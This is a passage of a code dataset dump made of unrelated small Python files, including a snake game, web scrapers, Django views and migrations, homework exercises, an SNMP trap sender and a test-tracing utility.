surface.blit(boundaryblock, (x * snake.BLOCK_SIZE, 0))\n surface.blit(boundaryblock, (x * snake.BLOCK_SIZE,\n (HEIGHT + 1) * snake.BLOCK_SIZE,))\n\n\npygame.init()\n\nclock = pygame.time.Clock()\nscreen = pygame.display.set_mode(\n ((WIDTH + 2) * snake.BLOCK_SIZE, (HEIGHT + 2) * snake.BLOCK_SIZE))\nscreen.fill((0, 0, 0))\n\n# initialize\nsnek = snake.snake(screen, WIDTH / 2, HEIGHT / 2)\nfd = food.food(screen, 1, HEIGHT + 1, 1, WIDTH + 1)\n\n# ensure food does not appear in snake body\nwhile fd.get_position() in snek.get_body_positions():\n fd.__init__(screen, 1, HEIGHT + 1, 1, WIDTH + 1)\n\n\ndraw_boundary(screen)\npygame.display.flip()\n\nnum_eaten = 0\n\nrunning = True\nwhile running:\n\n # check crash or move outside the limits\n if not in_game_boundary(snek) or snek.crashed:\n running = False\n\n else:\n\n fd.draw()\n snek.draw()\n draw_boundary(screen)\n pygame.display.flip()\n\n # check if snake eates\n if fd.get_position() == snek.get_head_position():\n snek.grow()\n\n # food should not appear where the snake is\n fd.__init__(screen, 1, HEIGHT + 1, 1, WIDTH + 1)\n while fd.get_position() in snek.get_body_positions():\n fd.__init__(screen, 1, HEIGHT + 1, 1, WIDTH + 1)\n num_eaten += 1\n # increase game speed\n if num_eaten % SPEED_INC == 0:\n SPEED += SPEED_TICK\n\n clock.tick(SPEED)\n\n event = pygame.event.poll()\n\n if event.type == pygame.QUIT:\n sys.exit()\n\n elif event.type == pygame.KEYDOWN:\n move_dir_current = snek.get_move_dir()\n if event.key == pygame.K_ESCAPE:\n sys.exit()\n elif event.key == pygame.K_UP and move_dir_current != snake.DOWN:\n snek.set_move_dir(snake.UP)\n elif event.key == pygame.K_DOWN and move_dir_current != snake.UP:\n snek.set_move_dir(snake.DOWN)\n elif event.key == pygame.K_RIGHT and move_dir_current != snake.LEFT:\n snek.set_move_dir(snake.RIGHT)\n elif event.key == pygame.K_LEFT and move_dir_current != snake.RIGHT:\n snek.set_move_dir(snake.LEFT)\n\n snek.remove()\n snek.move()\n\nsnek.draw()\ndraw_boundary(screen)\nsnek_body_positions = snek.get_body_positions()\n\n\nfor position in snek_body_positions[1:]:\n screen.blit(snek.backblock, (position[\n 1] * snake.BLOCK_SIZE, position[0] * snake.BLOCK_SIZE))\n pygame.display.flip()\n clock.tick(SHORT)\n\nwhile True:\n # screen.blit(gameovertext,((WIDTH-4)*snake.BLOCK_SIZE/2,HEIGHT*snake.BLOCK_SIZE/2))\n pygame.display.flip()\n 
sys.exit()\n","sub_path":"snakegame.py","file_name":"snakegame.py","file_ext":"py","file_size_in_byte":3539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"400243528","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019-03-18 20:52\n# @Author : ZD Liu\n\n\nimport sys\nimport os\nimport csv\nimport gzip\n\ndef process_file(file):\n dic_indicator = {}\n for i in file:\n try:\n if i == []:\n continue\n if i[2] == indicator_of_interest.strip():\n for m in range(len(i)):\n dic_indicator[i[0]] = i[4:]\n except Exception as e:\n pass\n return dic_indicator\n\n\ndef process_maxvalue(dic):\n dic_not_none = {}\n max_value_year = {}\n for dic_key in dic.keys():\n for i in range(len(dic[dic_key])):\n if dic[dic_key][i] == '':\n pass\n else:\n dic_not_none[(dic_key,i+first_year)] = float(dic[dic_key][i])\n max_value = max(dic_not_none.values())\n for key in dic_not_none.keys():\n if dic_not_none[key] == max_value:\n if key[1] in max_value_year.keys():\n max_value_year[key[1]].append(key[0])\n else:\n max_value_year[key[1]] = [key[0]]\n return max_value, max_value_year\n\nfilename = 'HNP_Data.csv.gz'\nif not os.path.exists(filename):\n print(f'There is no file named {filename} in the working directory, giving up...')\n sys.exit()\n\nindicator_of_interest = input('Enter an Indicator Name: ')\n\nfirst_year = 1960\nnumber_of_years = 56\nmax_value = None\ncountries_for_max_value_per_year = {}\n\nwith gzip.open(filename) as csvfile:\n file = csv.reader(line.decode('utf8').replace('\\0', '') for line in csvfile)\n res_dic = process_file(file)\n if len(res_dic.keys()) > 0:\n max_value , countries_for_max_value_per_year = process_maxvalue(res_dic)\n if max_value != None :\n if max_value % 1 ==0:\n max_value = int(max_value)\n\n\nif max_value is None:\n print('Sorry, either the indicator of interest does not exist or it has no data.')\nelse:\n print('The maximum value is:', max_value)\n print('It was reached in these years, for these countries or categories:')\n print('\\n'.join(f' {year}: {countries_for_max_value_per_year[year]}'\n for year in sorted(countries_for_max_value_per_year)\n )\n )\n\n\n\n","sub_path":"unsw-it-9021/python-code/quiz4/quiz4_submission.py","file_name":"quiz4_submission.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"235794402","text":"# https://www.codeeval.com/open_challenges/16/\r\n# COMPLETED 07.08.2016\r\n\r\n'''\r\nWrite a program which determines the number of 1 bits in the internal representation of a given integer.\r\n'''\r\n\r\ntest_cases = ['10','22','56']\r\n\r\nfor test in test_cases:\r\n test = test.strip()\r\n test = bin(int(test))\r\n count = 0\r\n for x in test:\r\n if x == '1':\r\n count += 1\r\n print(count)","sub_path":"Medium/Number of Ones 0708/numOnes.py","file_name":"numOnes.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"249218133","text":"import requests\nimport pandas as pd\nfrom bs4 import BeautifulSoup\n\nurl = 'https://forecast.weather.gov/MapClick.php?lat=37.7772&lon=-122.4168#.XAz1Ty4zbdg'\n\npage = requests.get(url)\n\n# BeautifulSoup Class\nsoup = BeautifulSoup(page.content, 'html.parser')\n\n# Filtering data\nseven_day = soup.find('div', id = 'seven-day-forecast')\nforecast_items = seven_day.find_all(class_ = 'tombstone-container')\n\n# Getting indv info\ntemperature = 
[x.get_text() for x in seven_day.select(\".tombstone-container .temp\")]\n\nweather = [x.get_text() for x in seven_day.select(\".tombstone-container .short-desc\")]\n\nday = [x.get_text() for x in seven_day.select(\".tombstone-container .period-name\")]\n\n# Creating a dataframe\nweek = pd.DataFrame({'Temperature': temperature,\n\t\t 'Weather': weather}, index = day)\nprint(week)\n","sub_path":"weather_forecast.py","file_name":"weather_forecast.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"125807290","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('moocs', '0006_delete_user'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Language',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),\n ('language_name', models.TextField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='University',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),\n ('abbreviation', models.TextField()),\n ('full_name', models.TextField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.RemoveField(\n model_name='mooc',\n name='pub_date',\n ),\n migrations.AddField(\n model_name='mooc',\n name='beging_date',\n field=models.DateTimeField(default=datetime.datetime(2015, 4, 6, 14, 53, 7, 186623, tzinfo=utc)),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='mooc',\n name='end_date',\n field=models.DateTimeField(default=datetime.datetime(2015, 4, 6, 14, 53, 12, 578577, tzinfo=utc)),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='mooc',\n name='language',\n field=models.ForeignKey(related_name='mooc_language', null=True, to='moocs.Language'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='mooc',\n name='subtitles',\n field=models.ForeignKey(related_name='mooc_subtitles_language', null=True, to='moocs.Language'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='mooc',\n name='workload',\n field=models.IntegerField(default=4),\n preserve_default=False,\n ),\n ]\n","sub_path":"moocs/migrations/0007_auto_20150406_1753.py","file_name":"0007_auto_20150406_1753.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"51113782","text":"import ROOT as r\nimport Plotter as p\n \nf = r.TFile('../data/SingleMuon/zskim2018D/CSCDigiTree-Full.root')\ncan = p.Canvas(lumi='')\n \npt_h = f.Get('h_muonCuts')\n \n \npt = p.Plot(pt_h,'', legType='',option='hist')\n\ncan.addMainPlot(pt, color=r.kBlue)\npt.scaleTitleOffsets(1.2,'Y')\n#can.makeLegend(pos='tl')\n \ncan.cleanup('muonCuts.pdf', mode='BOB')#","sub_path":"CSCPatterns/python/3layerplots/make3LayerCLCTPlots_muonCuts.py","file_name":"make3LayerCLCTPlots_muonCuts.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"408316096","text":"\"\"\"Script to gather IMDB keywords from 2013's top grossing movies.\"\"\"\nimport sys\nimport requests\nfrom bs4 import BeautifulSoup\nimport csv\n\nURL = 
\"http://www.imdb.com/search/title?at=0&sort=boxoffice_gross_us,desc&start=1&year=2013,2013\"\n\ndef get_top_grossing_movie_links(url):\n \"\"\"Return a list of tuples containing the top grossing movies of 2013 and link to their IMDB\n page.\"\"\"\n response = requests.get(url)\n movies_list = []\n print (response)\n for each_url in BeautifulSoup(response.text).select('.title a[href*=\"title\"]'):\n movie_title = each_url.text \n if movie_title != 'X':\n movies_list.append((movie_title, each_url['href']))\n return movies_list\n\n\nmovies = get_top_grossing_movie_links(URL)\nwith open('output.csv', 'w') as output:\n csvwriter = csv.writer(output)\n for title, url in movies: \n csvwriter.writerow([title, \"http://www.imdb.com\"+ url])","sub_path":"PythonApplication1/PythonApplication1/PythonApplication1.py","file_name":"PythonApplication1.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"290602919","text":"#lesson1\n\n# ДЗ1 Поработайте с переменными, создайте несколько, выведите на экран, запросите у пользователя несколько\n# чисел и строк и сохраните в переменные, выведите на экран.\n\nnumber_a = int(input('Введите первое число: '))\nnumber_b = int(input('Введите второе число: '))\nprint(number_a)\nprint(number_b)\n\n# ДЗ2 Пользователь вводит время в секундах. Переведите время в часы, минуты и секунды и выведите в формате чч:мм:сс.\n# Используйте форматирование строк.\n\ntime = int(input('Введите время в секундах: '))\ntime_h = time // 3600\ntime_m = (time-time_h*3600) // 60\ntime_s = time % 60\nprint('Время',time_h, ':', time_m, ':', time_s)\n\n# ДЗ3 Узнайте у пользователя число n. Найдите сумму чисел n + nn + nnn. Например, пользователь ввёл число 3.\n# Считаем 3 + 33 + 333 = 369.\n\nnumber = (input('Введите число: '))\nnumber_a = (number + number)\nnumber_a = int(number_a)\nnumber_b = (number + number + number)\nnumber_b = int(number_b)\nnumber = int(number)\nsum = int(number + number_a + number_b)\nprint(sum)\n\n# ДЗ4 Пользователь вводит целое положительное число. Найдите самую большую цифру в числе.\n# Для решения используйте цикл while и арифметические операции\n\n\nn = int(input(\"Введите целое положительное число \"))\nmax = n % 10\nwhile n >= 1:\n n = n // 10\n if n % 10 > max:\n max = n % 10\n if n > 9:\n continue\n else:\n print(\"Максимальное цифра в числе \", max)\n break\n\n\n\n# ДЗ 5 Запросите у пользователя значения выручки и издержек фирмы. Определите, с каким финансовым результатом\n# работает фирма (прибыль — выручка больше издержек, или убыток — издержки больше выручки). Выведите соответствующее\n# сообщение. Если фирма отработала с прибылью, вычислите рентабельность выручки (соотношение прибыли к выручке).\n# Далее запросите численность сотрудников фирмы и определите прибыль фирмы в расчете на одного сотрудника.\n\nproceeds = int(input('Введиту выручку организации: '))\nlesion = int(input('Введите убыток организации: '))\nif proceeds > lesion:\n print('Ваша фирма работает с прибылью')\n profitability = proceeds / lesion\n print(f'Рентабельность вашей фирмы {profitability :%}')\n sotrudniki = int(input('Сколько у вас сотрудников: '))\n profitability_sot = (proceeds - lesion) / sotrudniki\n print(f'Прибыль на одного сотрудника {profitability_sot} рублей')\nelse:\n print('Ваша фирма работает с убытком')\n \n\n# ДЗ 6 Спортсмен занимается ежедневными пробежками. 
В первый день его результат составил a километров.\n# Каждый день спортсмен увеличивал результат на 10 % относительно предыдущего. Требуется определить номер дня,\n# на который общий результат спортсмена составить не менее b километров. Программа должна принимать\n# значения параметров a и b и выводить одно натуральное число — номер дня.\n\ndistance = int(input('Сколько километров пробегает спортсмен: '))\ndistance_const = int(input('Количество километров: '))\n\nday = 1\nwhile distance < distance_const:\n day +=1\n distance *= 1.1\nprint(day)\n\n\n\n\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"9860219","text":"from django.shortcuts import redirect, render\nfrom django.contrib.sites.models import get_current_site\nfrom django.utils import translation\nfrom django.utils.encoding import force_text\nfrom django.core.urlresolvers import reverse\n\nfrom .forms import ContactForm\n\nfrom core.utils.views import JsonResponse\nfrom core.utils.helpers import clean_sting, send_mail\n\ndef contacts(request):\n template = 'contacts/contacts.html'\n if request.method == 'POST':\n lang = translation.get_language()\n form = ContactForm(request.POST)\n if form.is_valid():\n data = form.cleaned_data\n addresses = \"gav@bodun.org, gav-gav@bodun.org\"\n recipients = [x.strip() for x in clean_sting(addresses).split(',')]\n site = get_current_site(request)\n ctx_dict = {\n 'site': site,\n 'phone': data.get('phone'),\n 'name': data.get('name'),\n 'email': data.get('email'),\n 'message': data.get('message'),\n }\n send_mail(recipients,\n 'contacts/mail/email_subject.txt',\n 'contacts/mail/email.html',\n 'contacts/mail/email.txt',\n ctx_dict)\n return JsonResponse({'success': True, 'location': reverse('contacts_thank_you')})\n else:\n errors = dict([(k, force_text(v[0])) for k, v in form.errors.items()])\n return JsonResponse({'success': False, 'errors': errors})\n else:\n form = ContactForm()\n ctx = {'form': form}\n return render(request, template, ctx)\n\n\ndef thank_you(request):\n template = 'contacts/thank_you.html'\n ctx = {}\n return render(request, template, ctx)\n","sub_path":"contacts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"400795920","text":"#!/usr/bin/python3\n'''evaluates candidates applying for a back-end position'''\nimport requests\nimport sys\n\nif __name__ == \"__main__\":\n url = 'https://api.github.com/repos/{}/{}/commits'\\\n .format(sys.argv[2], sys.argv[1])\n r = requests.get(url)\n data = r.json()\n for i in range(len(data)):\n if i < 10:\n print('{}: {}'.format(data[i]['sha'],\n data[i]['commit']['author']['name']))\n else:\n break\n","sub_path":"0x11-python-network_1/100-github_commits.py","file_name":"100-github_commits.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"181307833","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@File : sendtrap.py\n@Author: sh\n@Date : 2019/1/24\n@Desc :\n\"\"\"\nfrom pysnmp.carrier.asyncore.dispatch import AsyncoreDispatcher\nfrom pysnmp.carrier.asyncore.dgram import udp, udp6\nfrom pyasn1.codec.ber import encoder\nfrom pysnmp.proto import api\n\n\n#发送snmptrap\n# Protocol version to use\n# pMod = api.protoModules[api.protoVersion1]\n#版本 2c\npMod = 
api.protoModules[api.protoVersion2c]\n\n# Build PDU\ntrapPDU = pMod.TrapPDU()\npMod.apiTrapPDU.setDefaults(trapPDU)\n\n\n# Traps have quite different semantics across proto versions\nif pMod == api.protoModules[api.protoVersion1]:\n pMod.apiTrapPDU.setEnterprise(trapPDU, (1, 3, 6, 1, 1, 2, 3, 4, 1))\n pMod.apiTrapPDU.setGenericTrap(trapPDU, 'coldStart')\n # pMod.apiTrapPDU.setSpecificTrap(trapPDU, 'news')\nelse:\n #发送内容\n var = []\n oid1 = (1, 3, 6, 1, 4, 1, 2014516, 1, 1, 1, 2, 0)\n val1 = pMod.Integer(1)\n\n oid2 = (1, 3, 6, 1, 4, 1, 2014516, 1, 1, 1, 3, 0)\n val2 = pMod.OctetString('11111111111')\n var.append((oid1, val1))\n var.append((oid2, val2))\n\n pMod.apiTrapPDU.setVarBinds(trapPDU,var)\n# Build message\ntrapMsg = pMod.Message()\npMod.apiMessage.setDefaults(trapMsg)\npMod.apiMessage.setCommunity(trapMsg, 'public')\npMod.apiMessage.setPDU(trapMsg, trapPDU)\n\ntransportDispatcher = AsyncoreDispatcher()\n\n# UDP/IPv4\ntransportDispatcher.registerTransport(\n udp.domainName, udp.UdpSocketTransport().openClientMode()\n)\n#发送服务器地址\ntransportDispatcher.sendMessage(\n encoder.encode(trapMsg), udp.domainName, ('192.168.3.185', 162)\n)\n\n# # UDP/IPv6\n# transportDispatcher.registerTransport(\n# udp6.domainName, udp6.Udp6SocketTransport().openClientMode()\n# )\n# transportDispatcher.sendMessage(\n# encoder.encode(trapMsg), udp6.domainName, ('::1', 162)\n# )\n\n# Dispatcher will finish as all scheduled messages are sent\ntransportDispatcher.runDispatcher()\n\ntransportDispatcher.closeDispatcher()\n","sub_path":"python_pysnmp_example/sendtrap.py","file_name":"sendtrap.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"42108313","text":"lr = 0.0\nya = 0\nyu = 0\nfor i in range(401):\n for j in range(301):\n if (i*100+j*125) <= 50000:\n lrt = i*5 + j*4\n if lr < lrt:\n lr = lrt\n ya = i\n yu = j\nprint(ya)\nprint(yu)\nprint(lr)","sub_path":"07-实践-其他/39-演示代码/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"163097010","text":"import datetime\n\nfrom django.contrib import messages\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import login, logout, authenticate\nfrom django.contrib.auth.forms import UserCreationForm, AuthenticationForm\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render, redirect\nfrom wypozyczalnia.forms import PlaceAndDate, Sam, Sam1\nfrom wypozyczalnia.models import Samochod, Miejsce, Rezerwacje\n\n\n# Create your views here.\n\ndef index(request):\n if request.method == 'POST':\n form = PlaceAndDate(request.POST)\n if form.is_valid():\n request.session['miejsce_odb'] = form.cleaned_data.get('miejsce_odb')\n request.session['miejsce_zwr'] = form.cleaned_data.get('miejsce_zwr')\n request.session['data_odb'] = form.cleaned_data.get('data_odb')\n request.session['data_zwr'] = form.cleaned_data.get('data_zwr')\n return HttpResponseRedirect('samochody/')\n else:\n x = datetime.date.today()\n today = x.strftime(\"%Y-%m-%d\")\n form = PlaceAndDate()\n return render(request, 'wypozyczalnia/index.html',\n {\"samochody\": Samochod.objects.all, \"miejsca\": Miejsce.objects.all, \"today\": today, \"form\": form})\n\n\ndef samochody(request):\n if request.method == 'POST':\n form = Sam(request.POST)\n if form.is_valid():\n request.session['sam'] = form.cleaned_data.get('sam')\n return 
HttpResponseRedirect('../szczegoly/')\n else:\n dataodb = datetime.datetime.strptime(request.session['data_odb'], \"%Y-%m-%d\").date()\n datazwr = datetime.datetime.strptime(request.session['data_zwr'], \"%Y-%m-%d\").date()\n dni = ((datazwr - dataodb).days) + 1\n form = Sam()\n # b = Rezerwacje(klient=request.user, samochod_id=1,\n # miejsce_odbioru=Miejsce.objects.get(adres=request.session['miejsce_odb']),\n # miejsce_zwrotu=Miejsce.objects.get(adres=request.session['miejsce_zwr']),\n # data_odbioru=dataodb, data_zwrotu=datazwr)\n # b.save()\n return render(request, 'wypozyczalnia/samochody.html',\n {\"samochody\": Samochod.objects.all(),\n \"miejsce_odb\": request.session['miejsce_odb'],\n \"miejsce_zwr\": request.session['miejsce_zwr'],\n \"data_odb\": request.session['data_odb'],\n \"data_zwr\": request.session['data_zwr'],\n \"dni\": dni,\n \"form\": form\n })\n\n\ndef szczegoly(request):\n if request.user.is_authenticated:\n if request.method == 'POST':\n form = Sam1(request.POST)\n if form.is_valid():\n request.session['sam1'] = form.cleaned_data.get('sam')\n return HttpResponseRedirect('../rezerwacja/')\n else:\n dataodb = datetime.datetime.strptime(request.session['data_odb'], \"%Y-%m-%d\").date()\n datazwr = datetime.datetime.strptime(request.session['data_zwr'], \"%Y-%m-%d\").date()\n dni = ((datazwr - dataodb).days) + 1\n form = Sam()\n # b = Rezerwacje(klient=request.user, samochod_id=1,\n # miejsce_odbioru=Miejsce.objects.get(adres=request.session['miejsce_odb']),\n # miejsce_zwrotu=Miejsce.objects.get(adres=request.session['miejsce_zwr']),\n # data_odbioru=dataodb, data_zwrotu=datazwr)\n # b.save()\n return render(request, 'wypozyczalnia/szczegoly.html',\n {\"s\": Samochod.objects.get(id=request.session['sam']),\n \"miejsce_odb\": request.session['miejsce_odb'],\n \"miejsce_zwr\": request.session['miejsce_zwr'],\n \"data_odb\": request.session['data_odb'],\n \"data_zwr\": request.session['data_zwr'],\n \"dni\": dni,\n \"form\": form,\n })\n else:\n return redirect('wypozyczalnia:logowanie')\n\n\ndef rezerwacja(request):\n if request.user.is_authenticated:\n dataodb = datetime.datetime.strptime(request.session['data_odb'], \"%Y-%m-%d\").date()\n datazwr = datetime.datetime.strptime(request.session['data_zwr'], \"%Y-%m-%d\").date()\n b = Rezerwacje(klient=request.user, samochod_id=request.session['sam1'],\n miejsce_odbioru=Miejsce.objects.get(adres=request.session['miejsce_odb']),\n miejsce_zwrotu=Miejsce.objects.get(adres=request.session['miejsce_zwr']),\n data_odbioru=dataodb, data_zwrotu=datazwr)\n b.save()\n return render(request, 'wypozyczalnia/rezerwacja.html',\n {\"s\": Samochod.objects.get(id=request.session['sam1']),\n \"miejsce_odb\": request.session['miejsce_odb'],\n \"miejsce_zwr\": request.session['miejsce_zwr'],\n \"data_odb\": request.session['data_odb'],\n \"data_zwr\": request.session['data_zwr'],\n })\n else:\n return redirect('wypozyczalnia:logowanie')\n\n\ndef register(request):\n if request.method == \"POST\":\n form = UserCreationForm(request.POST)\n if form.is_valid():\n user = form.save()\n username = form.cleaned_data.get('username')\n messages.success(request, f\"New account created: {username}\")\n login(request, user)\n return redirect(\"main:homepage\")\n\n else:\n for msg in form.error_messages:\n messages.error(request, f\"{msg}: {form.error_messages[msg]}\")\n\n return render(request=request,\n template_name=\"wypozyczalnia/rejestracja.html\",\n context={\"form\": form})\n\n form = UserCreationForm\n return render(request=request,\n 
template_name=\"wypozyczalnia/rejestracja.html\",\n context={\"form\": form})\n\n\ndef logout_request(request):\n logout(request)\n messages.info(request, \"Wylogowano!\")\n return redirect(\"/\")\n\n\ndef login_request(request):\n if request.method == 'POST':\n form = AuthenticationForm(request=request, data=request.POST)\n if form.is_valid():\n username = form.cleaned_data.get('username')\n password = form.cleaned_data.get('password')\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n messages.info(request, f\"Jesteś zalogowany jako {username}\")\n return redirect('/')\n else:\n messages.error(request, \"Zły login lub hasło.\")\n else:\n messages.error(request, \"Zły login lub hasło.\")\n form = AuthenticationForm()\n return render(request=request,\n template_name=\"wypozyczalnia/logowanie.html\",\n context={\"form\": form})\n","sub_path":"wypozyczalnia/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"476986607","text":"def movingTiles(l, s1, s2, queries):\n t=1\n S1 = l*s1*t\n S2 = l*s2*t\n for query in queries:\n t=1\n while (query != (((l*s1*t)-(l*s2*t))**2)):\n print((S1-S2)**2)\n t=t+1\n print(t)\n\n\ndef timeConversion(s):\n temp = s.split(':')\n if s[-2]=='P':\n print( str(int(s[0:2])+12)+':'+s[3:5]+':'+s[6:8] )\n","sub_path":"sherlocksquares.py","file_name":"sherlocksquares.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"471854001","text":"\"\"\"\nModule Description\n\"\"\"\nimport subprocess\nimport re\nimport os\nimport logging\nimport json\nfrom shutil import copyfile\nfrom shutil import rmtree\nfrom pathlib import Path\nimport plyj.parser as plyj\nimport plyj.model as model\nfrom Utility.progress_bar import ProgressBar\nimport sqlite3\nimport glob\nimport random\nimport uuid\n\n# region CONSTS\n\nMAX_SIZE_FOR_TRACE_FILE_IN_MB = 20\nPROJECT_ROOT_PATH = r\"C:\\personal-git\\apache\\commons-math\"\nTRACES_LOG_FILE_PATH = f\"{PROJECT_ROOT_PATH}\\\\traces0.log\"\nDATA_PATH = r\"C:\\personal-git\\Thesis\\ThesisScripts\\data\"\nBUG_DBS_PATH = r\"C:\\personal-git\\Thesis\\ThesisScripts\\bugdbs\"\n\n# endregion\n\n# region Logger Setup\nlogger = logging.getLogger('logger')\nlogger.setLevel(logging.INFO)\nch = logging.StreamHandler()\nformatter = logging.Formatter('[%(asctime)s | %(levelname)s] - %(message)s')\nch.setFormatter(formatter)\nlogger.addHandler(ch)\nrandom.seed(7)\n# endregion\n\n\nclass Trace(object):\n def __init__(self, tmid, trace_str):\n trace_str = trace_str.rstrip('\\n')\n trace_str = trace_str.rstrip('\\r')\n self.tmid = tmid\n self.mid = trace_str[:trace_str.find(',')]\n self.vector = trace_str[trace_str.find(',')+1:]\n\n\nclass ExperimentInstance(object):\n def __init__(self, tinfo_lst):\n self.tinfo_lst = tinfo_lst\n\n\nclass TestInfo(object):\n def __init__(self, tfile_full_path, tfile_name, tmethod_name, tannotations_lst):\n self.tfile_full_path = tfile_full_path\n self.tfile_name = tfile_name\n self.tmethod_name = tmethod_name\n self.tmethod_fullname = f\"{tfile_name}.{tmethod_name}\"\n self.tannotations = tannotations_lst\n self.is_faulty = None\n\n def add_result_from_output(self, test_output_str_result):\n resultidx = test_output_str_result.rfind(\"Tests run: 1\")\n result_dirty = test_output_str_result[resultidx:]\n result = result_dirty[:result_dirty.find('\\n')]\n 
result_vector = re.findall('\\\\b\\\\d+\\\\b', result) #['19', '0', '0', '0']\n result_vector = list(map(int, result_vector))\n num_of_tests, failures, errors, skipped = result_vector\n if num_of_tests > 1:\n raise ValueError(f'expected only 1 test, received {num_of_tests} tests')\n self.is_faulty = (failures + errors > 0)\n if skipped > 0:\n raise ValueError(f\"test was skipped\")\n\n\nclass TestSuitInformation(object):\n def __init__(self, tfiles_paths_list):\n self.tinfos = []\n for tfile_path in tfiles_paths_list:\n tfile_name = Path(tfile_path).stem\n tmethodnameTannotations = SimpleJavaTestFileParser.parse_and_return_methodnameTannotations(tfile_path)\n for (tmethod_name, annotations) in tmethodnameTannotations:\n self.tinfos.append(TestInfo(tfile_path, tfile_name, tmethod_name, annotations))\n \n def filter_in_valid_tests(self):\n tinfos_filtered = []\n for tinfo in self.tinfos:\n isTest = 'Test' in tinfo.tannotations\n isDeprecated = 'Deprecated' in tinfo.tannotations\n isIgnore = 'Ignore' in tinfo.tannotations\n if isTest and not isDeprecated and not isIgnore:\n tinfos_filtered.append(tinfo)\n self.tinfos = tinfos_filtered\n \n def filter_out_big_trace_files(self, max_size_in_mb):\n filtered_count = 0\n for (idx, tinfo) in enumerate(self.tinfos):\n tmethod_dir_path = f\"{DATA_PATH}\\\\{tinfo.tfile_name}\\\\{tinfo.tmethod_name}\"\n traces_file_path = f\"{tmethod_dir_path}\\\\test_method_traces.log\"\n statinfo = os.stat(traces_file_path)\n size_b = statinfo.st_size\n size_mb = (size_b >> 20)\n logger.info(f\"{traces_file_path} size: {size_mb} MB, max size allowed: {max_size_in_mb}\")\n if size_mb > max_size_in_mb:\n filtered_count += 1\n logger.info(f\"filtering {traces_file_path}. size: {size_mb} MB, max size allowed: {max_size_in_mb}\")\n portion = float(max_size_in_mb)/float(size_mb)\n small_file_path = f\"{tmethod_dir_path}\\\\test_method_traces_small.log\"\n with open(traces_file_path, \"r\") as big_file, open(small_file_path, \"w\") as small_file:\n for l in big_file:\n if random.random() < portion:\n small_file.write(l)\n os.remove(traces_file_path)\n os.rename(small_file_path, traces_file_path)\n statinfo = os.stat(traces_file_path)\n size_b = statinfo.st_size\n size_mb = (size_b >> 20)\n logger.info(f\"{traces_file_path} file size was changed to: {size_mb} MB\")\n return filtered_count\n\n\nclass SimpleJavaTestFileParser(object):\n parser = plyj.Parser()\n\n @staticmethod\n def old_get_tmethods_lines(java_tfile_path):\n with open(java_tfile_path, 'r') as tfile:\n store_next_line = False\n tmethods_lines = []\n for idx, line in enumerate(tfile):\n if store_next_line:\n tmethods_lines.append(line)\n store_next_line = False\n continue\n line = line.rstrip('\\n').strip('\\t').strip(' ')\n if line == '@Test':\n store_next_line = True\n return tmethods_lines\n\n @staticmethod\n def old_parse(java_test_file_path):\n tmethods_lines = SimpleJavaTestFileParser.old_get_tmethods_lines(java_test_file_path)\n tmethod_names = []\n for line in tmethods_lines:\n line_split = line.rstrip('\\n').strip('\\t').strip(' ').split(' ')\n if line_split[0] != 'public':\n #is not a valid case (e.g. 
